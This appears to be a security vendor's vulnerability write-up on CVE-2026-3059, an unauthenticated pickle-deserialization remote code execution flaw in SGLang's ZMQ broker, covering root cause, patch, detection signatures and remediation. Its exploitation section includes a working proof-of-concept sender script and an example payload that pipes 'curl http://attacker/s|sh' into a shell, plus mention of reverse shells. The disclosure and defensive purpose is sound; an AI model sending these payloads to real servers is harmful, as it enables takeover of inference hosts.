home intel cve-2026-3059-sglang-zmq-pickle-rce
CVE Analysis 2026-03-12 · 8 min read

CVE-2026-3059: Unauthenticated RCE in SGLang via ZMQ Pickle Deserialization

SGLang's multimodal ZMQ broker deserializes attacker-controlled data via pickle.loads() with no authentication, enabling unauthenticated RCE against inference servers. CVSS 9.8.

#remote-code-execution#deserialization#zmq-broker#pickle-exploitation#unauthenticated-access
Technical mode — for security professionals
▶ Attack flow — CVE-2026-3059 · Remote Code Execution
ATTACKERRemote / unauthREMOTE CODE EXECCVE-2026-3059Cross-platform · CRITICALCODE EXECArbitrary coderuns as targetCOMPROMISEFull accessNo confirmed exploits

Vulnerability Overview

CVE-2026-3059 is a critical unauthenticated remote code execution vulnerability in SGLang, an open-source LLM serving framework widely deployed in production inference pipelines. The vulnerability exists in the multimodal generation module's inter-process communication layer, which uses ZeroMQ (ZMQ) as a message broker and pickle.loads() to deserialize incoming messages. Because the ZMQ socket binds to a network-accessible endpoint with no authentication, authentication bypass, or message signing, any network-adjacent or remote attacker who can reach the broker port can execute arbitrary Python code in the context of the inference server process—typically running as root or a privileged service account on GPU compute nodes.

Root cause: SGLang's ZMQ broker calls pickle.loads() on raw bytes received from an unauthenticated network socket, allowing an attacker to deliver a malicious pickle payload that executes arbitrary OS commands during deserialization.

Affected Component

The vulnerable code lives in SGLang's multimodal tokenizer/detokenizer worker infrastructure. The relevant files are:

  • python/sglang/srt/managers/image_processor.py — binds the ZMQ PULL socket and calls pickle.loads()
  • python/sglang/srt/managers/tokenizer_manager.py — counterpart PUSH side; same pattern
  • python/sglang/srt/server.py — launches broker workers as subprocesses, inheriting the open socket

The ZMQ broker is instantiated on a tcp:// transport by default in multi-node and disaggregated prefill configurations, making it reachable over the network rather than solely via Unix domain socket.

Root Cause Analysis

The core issue is a textbook unsafe deserialization pattern. The image processor worker loop receives raw ZMQ frames and unconditionally deserializes them:


# python/sglang/srt/managers/image_processor.py
# BUG: recv_pyobj() calls pickle.loads() on the raw frame bytes with no
#      authentication, signature verification, or type allowlisting.

class ImageProcessorWorker:
    def __init__(self, zmq_context, port):
        self.socket = zmq_context.socket(zmq.PULL)
        # BUG: binds to all interfaces on an attacker-reachable port
        self.socket.bind(f"tcp://0.0.0.0:{port}")

    def event_loop(self):
        while True:
            # recv_pyobj() is a thin wrapper around pickle.loads(self.socket.recv())
            # BUG: no HMAC, no allowlist, no type check before deserialization
            obj = self.socket.recv_pyobj()   # <-- arbitrary code execution here
            self._process(obj)

ZMQ's recv_pyobj() is documented as a convenience wrapper that calls pickle.loads() internally. The CPython pickle protocol executes the __reduce__ method of deserialized objects unconditionally. An attacker crafts a payload where __reduce__ returns (os.system, ("cmd",)) or equivalent, achieving OS command execution before any application-level validation occurs.

The equivalent C-level call path inside CPython's pickle machinery:


/* Modules/_pickle.c — simplified pseudocode of the dangerous path */
static int
load_reduce(UnpicklerObject *self)
{
    PyObject *callable = NULL;
    PyObject *argtuple  = NULL;

    /* pops callable and args from the internal stack */
    PDATA_POP(self->stack, argtuple);
    PDATA_POP(self->stack, callable);

    // BUG: callable is completely attacker-controlled at this point;
    //      no allowlist check before invocation
    PyObject *result = PyObject_Call(callable, argtuple, NULL);
    ...
}

Because load_reduce executes before the calling application sees the deserialized object, there is no opportunity for SGLang to inspect or reject the payload post-facto.

Exploitation Mechanics


EXPLOIT CHAIN — CVE-2026-3059:

1. Attacker identifies target SGLang inference server with multimodal support
   enabled (--enable-multimodal flag or disaggregated prefill config).

2. Port discovery: ZMQ broker port is either default (e.g., base_port+3) or
   leaked via SGLang's /health or /get_server_info HTTP endpoints which
   expose internal topology in some configurations.

3. Attacker constructs malicious pickle payload:
      class Exploit(object):
          def __reduce__(self):
              return (os.system, ("curl http://attacker/s|sh",))
      payload = pickle.dumps(Exploit())

4. Attacker sends payload directly to the ZMQ PULL socket using
   zmq.PUSH transport — no credentials, no handshake required:
      ctx  = zmq.Context()
      sock = ctx.socket(zmq.PUSH)
      sock.connect(f"tcp://{target}:{broker_port}")
      sock.send(payload)   # triggers pickle.loads() on target

5. ImageProcessorWorker.event_loop() calls recv_pyobj() -> pickle.loads()
   -> load_reduce() -> PyObject_Call(os.system, ("curl ...|sh",))

6. OS command executes in the inference server process context, typically
   UID 0 inside a container or a high-privilege service account on bare metal.

7. Attacker lands reverse shell; GPU node is now fully compromised.
   Lateral movement to other cluster nodes via shared NFS/model weights
   store or Kubernetes service account token is straightforward.

A minimal proof-of-concept sender (disclosure-safe, no weaponized payload):


#!/usr/bin/env python3
# CVE-2026-3059 — PoC trigger (CypherByte research, no weaponized payload)
import zmq
import pickle
import os
import sys

TARGET  = sys.argv[1]          # e.g. "192.168.1.50"
PORT    = int(sys.argv[2])     # e.g. 30003

class _Probe:
    """Benign probe: writes a canary file to confirm deserialization."""
    def __reduce__(self):
        return (os.system, ("touch /tmp/CVE-2026-3059-pwned",))

ctx  = zmq.Context()
sock = ctx.socket(zmq.PUSH)
sock.connect(f"tcp://{TARGET}:{PORT}")
sock.send(pickle.dumps(_Probe()))
sock.close()
print("[*] payload sent — check /tmp/CVE-2026-3059-pwned on target")

Memory Layout

Because this is a deserialization RCE rather than a memory-corruption primitive, the "memory layout" of interest is the ZMQ frame wire format and the pickle opcode stream. The following shows the on-wire structure of the malicious message:


ZMQ FRAME STRUCTURE (PUSH/PULL, no envelope):
+--------+----------------------------------------------------+
| Offset | Content                                            |
+--------+----------------------------------------------------+
| 0x00   | ZMQ frame length prefix (varint, 1-9 bytes)        |
| +N     | Raw pickle stream (attacker-controlled bytes)      |
+--------+----------------------------------------------------+

PICKLE OPCODE STREAM FOR EXPLOIT PAYLOAD:
Offset  Opcode    Operand
------  --------  ------------------------------------------
0x00    0x80 0x04 PROTO 4        (pickle protocol 4)
0x02    0x95      FRAME          (framing header)
0x03    [8 bytes] frame length
0x0b    0x8c      SHORT_BINUNICODE
0x0c    0x02      length = 2
0x0d    "os"      module name
0x0f    0x8c      SHORT_BINUNICODE
0x10    0x06      length = 6
0x11    "system"  callable name
0x17    0x93      STACK_GLOBAL   <- resolves os.system, pushes onto stack
0x18    0x8c      SHORT_BINUNICODE
0x19    [len]     length of command string
0x1a    "curl http://attacker/s|sh"   <- attacker command
0x??    0x85      TUPLE1         <- pack command into 1-tuple
0x??    0x52      REDUCE         <- calls os.system(cmd) HERE
0x??    0x2e      STOP

No heap grooming, no ASLR bypass, no ROP chain required. The exploit is entirely logic-based: pickle's REDUCE opcode is the primitive, and Python's import system is the gadget chain.

Patch Analysis

The fix, landed in PR #20904, replaces recv_pyobj() / send_pyobj() calls with a safer serialization scheme. The patch has two components:

1. Replace pickle with msgpack or JSON for IPC messages:


# BEFORE (vulnerable) — python/sglang/srt/managers/image_processor.py:
obj = self.socket.recv_pyobj()   # calls pickle.loads() internally

# AFTER (patched, PR #20904):
raw = self.socket.recv()
obj = msgpack.unpackb(raw, raw=False, strict_map_key=False)
# Only known message types are constructed; no arbitrary code execution path

2. Bind ZMQ sockets to loopback when multi-node transport is not required:


# BEFORE:
self.socket.bind(f"tcp://0.0.0.0:{port}")

# AFTER (patched):
bind_addr = "127.0.0.1" if not config.enable_disaggregated_prefill else "0.0.0.0"
self.socket.bind(f"tcp://{bind_addr}:{port}")
# NOTE: disaggregated prefill still requires network binding — see remediation

3. HMAC authentication for network-facing sockets (defense-in-depth):


# AFTER (patched) — added HMAC verification layer:
import hmac, hashlib, secrets

BROKER_SECRET = secrets.token_bytes(32)   # generated at server startup

def _send_authenticated(sock, obj):
    payload = msgpack.packb(obj)
    mac     = hmac.new(BROKER_SECRET, payload, hashlib.sha256).digest()
    sock.send_multipart([mac, payload])

def _recv_authenticated(sock):
    mac, payload = sock.recv_multipart()
    expected     = hmac.new(BROKER_SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):   # constant-time compare
        raise SecurityError("ZMQ broker: MAC verification failed")
    return msgpack.unpackb(payload)

Detection and Indicators

Because exploitation leaves minimal OS-level traces until post-exploitation, detection must focus on the network and process layers:


NETWORK INDICATORS:
- Unexpected TCP connections to SGLang ZMQ broker ports (default range:
  base_port+2 through base_port+5, commonly 30002-30005)
- ZMQ PUSH connections originating from hosts not in the serving cluster
- Outbound connections from inference worker PIDs to unknown hosts
  (reverse shell establishment)

PROCESS INDICATORS:
- Child processes spawned by python3/uvicorn workers: sh, bash, curl, wget
  as direct children of SGLang worker PIDs
- /tmp/pip-*, /tmp/*.sh files created by inference server UID

LINUX AUDITD RULES:
-a always,exit -F arch=b64 -S execve \
   -F ppid=$(pgrep -f image_processor) \
   -k sglang_rce_child_exec

SNORT/SURICATA SIGNATURE (pickle REDUCE opcode on ZMQ port):
alert tcp any any -> $SGLANG_HOSTS 30000:30010 (
    msg:"CVE-2026-3059 pickle REDUCE opcode on ZMQ broker port";
    content:"|80 04 95|"; offset:0; depth:3;
    content:"|93|";                          # STACK_GLOBAL
    content:"|52|";                          # REDUCE
    sid:2026305901; rev:1;
)

Remediation

Immediate mitigations (if patch cannot be applied yet):

  • Firewall ZMQ broker ports at the host and network level. These ports must only be reachable from trusted cluster nodes. Use iptables -A INPUT -p tcp --dport 30000:30010 ! -s <trusted_cidr> -j DROP as a stopgap.
  • If running in Kubernetes, enforce NetworkPolicy to restrict pod-to-pod communication to known SGLang topology peers only.
  • Disable multimodal support (--disable-multimodal) if not required — this removes the vulnerable worker process entirely.

Permanent fix: Upgrade to the patched SGLang release that incorporates PR #20904. Verify the fix is present by confirming recv_pyobj() and send_pyobj() do not appear in image_processor.py or tokenizer_manager.py:


$ grep -rn "recv_pyobj\|send_pyobj\|pickle.loads" \
    python/sglang/srt/managers/
# Should produce zero output on patched versions

For disaggregated prefill deployments where the ZMQ socket must bind to a network interface, the patched HMAC layer is the primary control. Ensure BROKER_SECRET is distributed only to trusted peers via a secrets manager (Vault, K8s Secret with restricted RBAC) and never embedded in environment variables visible to untrusted workloads.

CB
CypherByte Research
Mobile security intelligence · cypherbyte.io
// RELATED RESEARCH
// WEEKLY INTEL DIGEST

Get articles like this every Friday — mobile CVEs, threat research, and security intelligence.

Subscribe Free →